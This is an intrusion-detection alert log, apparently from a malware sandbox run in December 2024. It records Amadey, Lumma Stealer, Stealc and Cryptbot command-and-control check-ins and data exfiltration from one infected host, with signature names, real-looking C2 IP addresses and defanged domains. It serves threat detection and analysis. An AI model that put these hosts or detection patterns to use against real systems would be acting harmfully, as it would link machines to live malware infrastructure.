2024-12-19T10:11:07.114666+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	50035	185.215.113.206	80	TCP
2024-12-19T10:11:07.253746+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.6	50048	185.215.113.43	80	TCP
2024-12-19T10:11:08.559564+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	50035	185.215.113.206	80	TCP
2024-12-19T10:11:08.716398+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	50049	31.41.244.11	80	TCP
2024-12-19T10:11:11.092642+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	50020	172.67.179.109	443	TCP
2024-12-19T10:11:11.092642+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50020	172.67.179.109	443	TCP
2024-12-19T10:11:13.085283+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50072	172.67.179.109	443	TCP
2024-12-19T10:11:13.085283+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50072	172.67.179.109	443	TCP
2024-12-19T10:11:14.439770+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50078	172.67.177.88	443	TCP
2024-12-19T10:11:15.787829+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.6	50083	185.215.113.43	80	TCP
2024-12-19T10:11:17.171670+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	50035	185.215.113.206	80	TCP
2024-12-19T10:11:17.241351+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	50084	31.41.244.11	80	TCP
2024-12-19T10:11:18.448881+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	50035	185.215.113.206	80	TCP
2024-12-19T10:11:20.346594+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	50047	104.21.12.88	443	TCP
2024-12-19T10:11:20.346594+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50047	104.21.12.88	443	TCP
2024-12-19T10:11:21.578304+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50086	104.21.12.88	443	TCP
2024-12-19T10:11:24.362019+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	50087	185.215.113.16	80	TCP
2024-12-19T10:11:27.748630+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	50078	172.67.177.88	443	TCP
2024-12-19T10:11:27.748630+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50078	172.67.177.88	443	TCP
2024-12-19T10:11:28.702130+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.6	50089	185.215.113.43	80	TCP
2024-12-19T10:11:28.979128+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50090	172.67.177.88	443	TCP
2024-12-19T10:11:30.160207+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	50091	31.41.244.11	80	TCP
2024-12-19T10:11:32.043863+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50094	172.67.179.109	443	TCP
2024-12-19T10:11:32.043863+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50094	172.67.179.109	443	TCP
2024-12-19T10:11:35.043329+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	50086	104.21.12.88	443	TCP
2024-12-19T10:11:35.043329+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50086	104.21.12.88	443	TCP
2024-12-19T10:11:36.027617+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.6	50098	185.215.113.43	80	TCP
2024-12-19T10:11:36.820573+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50097	104.21.12.88	443	TCP
2024-12-19T10:11:37.425638+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.6	50096	185.215.113.206	80	TCP
2024-12-19T10:11:38.289026+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	50094	172.67.179.109	443	TCP
2024-12-19T10:11:39.954035+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	50090	172.67.177.88	443	TCP
2024-12-19T10:11:39.954035+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50090	172.67.177.88	443	TCP
2024-12-19T10:11:41.000375+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50117	172.67.179.109	443	TCP
2024-12-19T10:11:41.000375+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50117	172.67.179.109	443	TCP
2024-12-19T10:11:42.524542+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	50126	31.41.244.11	80	TCP
2024-12-19T10:11:46.414587+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.6	50133	185.215.113.43	80	TCP
2024-12-19T10:11:46.824975+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.6	50132	185.215.113.206	80	TCP
2024-12-19T10:11:47.594214+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	50097	104.21.12.88	443	TCP
2024-12-19T10:11:47.964450+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	50135	31.41.244.11	80	TCP
2024-12-19T10:11:48.944320+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50136	104.21.12.88	443	TCP
2024-12-19T10:11:52.923263+0100	2058378	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)	1	192.168.2.6	53506	1.1.1.1	53	UDP
2024-12-19T10:11:53.121838+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.6	50138	185.215.113.43	80	TCP
2024-12-19T10:11:54.286496+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50140	172.67.179.109	443	TCP
2024-12-19T10:11:54.286496+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50140	172.67.179.109	443	TCP
2024-12-19T10:11:54.568248+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	50141	31.41.244.11	80	TCP
2024-12-19T10:11:56.589036+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50142	172.67.179.109	443	TCP
2024-12-19T10:11:56.589036+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50142	172.67.179.109	443	TCP
2024-12-19T10:11:56.759766+0100	2058354	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat)	1	192.168.2.6	65374	1.1.1.1	53	UDP
2024-12-19T10:11:57.025176+0100	2058354	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat)	1	192.168.2.6	65374	1.1.1.1	53	UDP
2024-12-19T10:11:58.406650+0100	2058355	ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI)	1	192.168.2.6	50144	104.21.66.85	443	TCP
2024-12-19T10:11:58.406650+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50144	104.21.66.85	443	TCP
2024-12-19T10:11:59.574844+0100	2058397	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pancakedipyps .click)	1	192.168.2.6	54398	1.1.1.1	53	UDP
2024-12-19T10:11:59.825624+0100	2058397	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pancakedipyps .click)	1	192.168.2.6	54398	1.1.1.1	53	UDP
2024-12-19T10:11:59.844297+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.6	50145	185.215.113.43	80	TCP
2024-12-19T10:12:00.786229+0100	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.6	50146	176.53.146.212	80	TCP
2024-12-19T10:12:01.140413+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.6	50148	104.21.23.76	443	TCP
2024-12-19T10:12:01.140413+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50148	104.21.23.76	443	TCP
2024-12-19T10:12:01.294273+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	50147	31.41.244.11	80	TCP
2024-12-19T10:12:02.435710+0100	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.6	50151	176.53.146.212	80	TCP
2024-12-19T10:12:04.871789+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50152	104.21.12.88	443	TCP
2024-12-19T10:12:06.284996+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	50140	172.67.179.109	443	TCP
2024-12-19T10:12:06.284996+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50140	172.67.179.109	443	TCP
2024-12-19T10:12:07.471674+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50160	172.67.180.113	443	TCP
2024-12-19T10:12:07.516092+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50161	172.67.179.109	443	TCP
2024-12-19T10:12:07.516092+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50161	172.67.179.109	443	TCP
2024-12-19T10:12:08.286214+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.6	50162	185.215.113.43	80	TCP
2024-12-19T10:12:09.742377+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	50171	31.41.244.11	80	TCP
2024-12-19T10:12:11.679833+0100	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.6	50176	176.53.146.212	80	TCP
2024-12-19T10:12:12.706709+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	50144	104.21.66.85	443	TCP
2024-12-19T10:12:12.706709+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50144	104.21.66.85	443	TCP
2024-12-19T10:12:12.952158+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	50142	172.67.179.109	443	TCP
2024-12-19T10:12:13.936958+0100	2058355	ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI)	1	192.168.2.6	50178	104.21.66.85	443	TCP
2024-12-19T10:12:13.936958+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50178	104.21.66.85	443	TCP
2024-12-19T10:12:15.070181+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50180	172.67.179.109	443	TCP
2024-12-19T10:12:15.070181+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50180	172.67.179.109	443	TCP
2024-12-19T10:12:16.881178+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	50148	104.21.23.76	443	TCP
2024-12-19T10:12:16.881178+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50148	104.21.23.76	443	TCP
2024-12-19T10:12:18.133008+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.6	50181	104.21.23.76	443	TCP
2024-12-19T10:12:18.133008+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50181	104.21.23.76	443	TCP
2024-12-19T10:12:20.443136+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	50161	172.67.179.109	443	TCP
2024-12-19T10:12:20.443136+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50161	172.67.179.109	443	TCP
2024-12-19T10:12:21.232056+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.6	50183	185.215.113.43	80	TCP
2024-12-19T10:12:22.493388+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50185	172.67.177.88	443	TCP
2024-12-19T10:12:22.509661+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50184	104.21.12.88	443	TCP
2024-12-19T10:12:22.627875+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50186	172.67.179.109	443	TCP
2024-12-19T10:12:22.627875+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50186	172.67.179.109	443	TCP
2024-12-19T10:12:23.114352+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	50160	172.67.180.113	443	TCP
2024-12-19T10:12:23.114352+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50160	172.67.180.113	443	TCP
2024-12-19T10:12:24.345770+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50188	172.67.180.113	443	TCP
2024-12-19T10:12:27.251497+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	50178	104.21.66.85	443	TCP
2024-12-19T10:12:27.251497+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50178	104.21.66.85	443	TCP
2024-12-19T10:12:29.617496+0100	2058378	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)	1	192.168.2.6	51044	1.1.1.1	53	UDP
2024-12-19T10:12:29.940260+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.6	50180	172.67.179.109	443	TCP
2024-12-19T10:12:30.996555+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50191	172.67.179.109	443	TCP
2024-12-19T10:12:30.996555+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50191	172.67.179.109	443	TCP
2024-12-19T10:12:31.390417+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.6	50189	TCP
2024-12-19T10:12:31.624950+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	50181	104.21.23.76	443	TCP
2024-12-19T10:12:31.624950+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50181	104.21.23.76	443	TCP
2024-12-19T10:12:31.759587+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50192	172.67.179.109	443	TCP
2024-12-19T10:12:31.759587+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50192	172.67.179.109	443	TCP
2024-12-19T10:12:32.728602+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.6	50193	185.215.113.43	80	TCP
2024-12-19T10:12:37.033137+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	50184	104.21.12.88	443	TCP
2024-12-19T10:12:37.325490+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.6	50195	185.215.113.206	80	TCP
2024-12-19T10:12:38.265211+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.6	50196	185.215.113.43	80	TCP
2024-12-19T10:12:38.610750+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50197	104.21.12.88	443	TCP
2024-12-19T10:12:38.614960+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.6	50197	104.21.12.88	443	TCP
2024-12-19T10:12:39.435882+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50205	172.67.179.109	443	TCP
2024-12-19T10:12:39.435882+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50205	172.67.179.109	443	TCP
2024-12-19T10:12:39.840166+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	50188	172.67.180.113	443	TCP
2024-12-19T10:12:39.840166+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50188	172.67.180.113	443	TCP
2024-12-19T10:12:40.344470+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50207	172.67.177.88	443	TCP
2024-12-19T10:12:43.378261+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.6	50211	185.215.113.43	80	TCP
2024-12-19T10:12:45.496389+0100	2058378	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)	1	192.168.2.6	54382	1.1.1.1	53	UDP
2024-12-19T10:12:45.847852+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	50191	172.67.179.109	443	TCP
2024-12-19T10:12:45.847852+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50191	172.67.179.109	443	TCP
2024-12-19T10:12:46.863780+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50213	172.67.179.109	443	TCP
2024-12-19T10:12:46.863780+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50213	172.67.179.109	443	TCP
2024-12-19T10:12:47.058442+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50192	172.67.179.109	443	TCP
2024-12-19T10:12:47.189997+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50214	172.67.179.109	443	TCP
2024-12-19T10:12:47.189997+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50214	172.67.179.109	443	TCP
2024-12-19T10:12:48.569654+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.6	50215	185.215.113.43	80	TCP
2024-12-19T10:12:48.924632+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.6	50216	185.215.113.16	80	TCP
2024-12-19T10:12:54.015556+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50251	104.21.12.88	443	TCP
2024-12-19T10:12:54.837899+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	50207	172.67.177.88	443	TCP
2024-12-19T10:12:56.129651+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50256	172.67.177.88	443	TCP
2024-12-19T10:12:56.295805+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	50205	172.67.179.109	443	TCP
2024-12-19T10:12:56.312916+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.6	50255	185.215.113.206	80	TCP
2024-12-19T10:12:57.565636+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50260	172.67.179.109	443	TCP
2024-12-19T10:12:57.565636+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50260	172.67.179.109	443	TCP
2024-12-19T10:13:01.021706+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	50214	172.67.179.109	443	TCP
2024-12-19T10:13:01.021706+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50214	172.67.179.109	443	TCP
2024-12-19T10:13:01.233322+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	50213	172.67.179.109	443	TCP
2024-12-19T10:13:01.233322+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50213	172.67.179.109	443	TCP
2024-12-19T10:13:02.456815+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50262	172.67.179.109	443	TCP
2024-12-19T10:13:02.456815+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50262	172.67.179.109	443	TCP
2024-12-19T10:13:04.205795+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.6	50263	185.215.113.206	80	TCP
2024-12-19T10:13:08.835560+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50251	104.21.12.88	443	TCP
2024-12-19T10:13:10.937102+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50267	172.67.177.88	443	TCP
2024-12-19T10:13:10.947593+0100	2058355	ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI)	1	192.168.2.6	50268	104.21.66.85	443	TCP
2024-12-19T10:13:10.947593+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50268	104.21.66.85	443	TCP
2024-12-19T10:13:12.639342+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50269	172.67.179.109	443	TCP
2024-12-19T10:13:12.639342+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50269	172.67.179.109	443	TCP
2024-12-19T10:13:15.015147+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	50262	172.67.179.109	443	TCP
2024-12-19T10:13:15.015147+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50262	172.67.179.109	443	TCP
2024-12-19T10:13:16.609402+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50272	172.67.179.109	443	TCP
2024-12-19T10:13:16.609402+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50272	172.67.179.109	443	TCP
2024-12-19T10:13:18.698257+0100	2058378	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)	1	192.168.2.6	57132	1.1.1.1	53	UDP
2024-12-19T10:13:20.070952+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50274	172.67.179.109	443	TCP
2024-12-19T10:13:20.070952+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50274	172.67.179.109	443	TCP
2024-12-19T10:13:25.174032+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	50268	104.21.66.85	443	TCP
2024-12-19T10:13:25.337700+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	50267	172.67.177.88	443	TCP
2024-12-19T10:13:26.410957+0100	2058355	ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI)	1	192.168.2.6	50307	104.21.66.85	443	TCP
2024-12-19T10:13:26.410957+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50307	104.21.66.85	443	TCP
2024-12-19T10:13:26.837375+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50309	172.67.177.88	443	TCP
2024-12-19T10:13:27.038266+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	50269	172.67.179.109	443	TCP
2024-12-19T10:13:28.493227+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50313	172.67.179.109	443	TCP
2024-12-19T10:13:28.493227+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50313	172.67.179.109	443	TCP
2024-12-19T10:13:28.498313+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.6	50313	172.67.179.109	443	TCP
2024-12-19T10:13:28.896173+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.6	50312	185.215.113.206	80	TCP
2024-12-19T10:13:32.716779+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	50274	172.67.179.109	443	TCP
2024-12-19T10:13:32.716779+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50274	172.67.179.109	443	TCP
2024-12-19T10:13:33.740139+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50317	172.67.179.109	443	TCP
2024-12-19T10:13:33.740139+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50317	172.67.179.109	443	TCP
2024-12-19T10:13:33.937186+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50318	172.67.179.109	443	TCP
2024-12-19T10:13:33.937186+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50318	172.67.179.109	443	TCP
2024-12-19T10:13:40.190940+0100	2058355	ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI)	1	192.168.2.6	50321	104.21.66.85	443	TCP
2024-12-19T10:13:40.190940+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50321	104.21.66.85	443	TCP
2024-12-19T10:13:41.782984+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.6	50309	172.67.177.88	443	TCP
2024-12-19T10:13:43.011144+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50324	172.67.177.88	443	TCP
2024-12-19T10:13:43.105173+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50325	172.67.179.109	443	TCP
2024-12-19T10:13:43.105173+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50325	172.67.179.109	443	TCP
2024-12-19T10:13:47.897086+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	50318	172.67.179.109	443	TCP
2024-12-19T10:13:47.897086+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50318	172.67.179.109	443	TCP
2024-12-19T10:13:48.009285+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50328	172.67.179.109	443	TCP
2024-12-19T10:13:48.009285+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50328	172.67.179.109	443	TCP
2024-12-19T10:13:56.214531+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50325	172.67.179.109	443	TCP
2024-12-19T10:13:56.888741+0100	2058355	ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI)	1	192.168.2.6	50349	104.21.66.85	443	TCP
2024-12-19T10:13:56.888741+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50349	104.21.66.85	443	TCP
2024-12-19T10:13:56.934754+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.6	50350	104.21.23.76	443	TCP
2024-12-19T10:13:56.934754+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50350	104.21.23.76	443	TCP
2024-12-19T10:13:57.746917+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50324	172.67.177.88	443	TCP
2024-12-19T10:14:04.571209+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50372	172.67.179.109	443	TCP
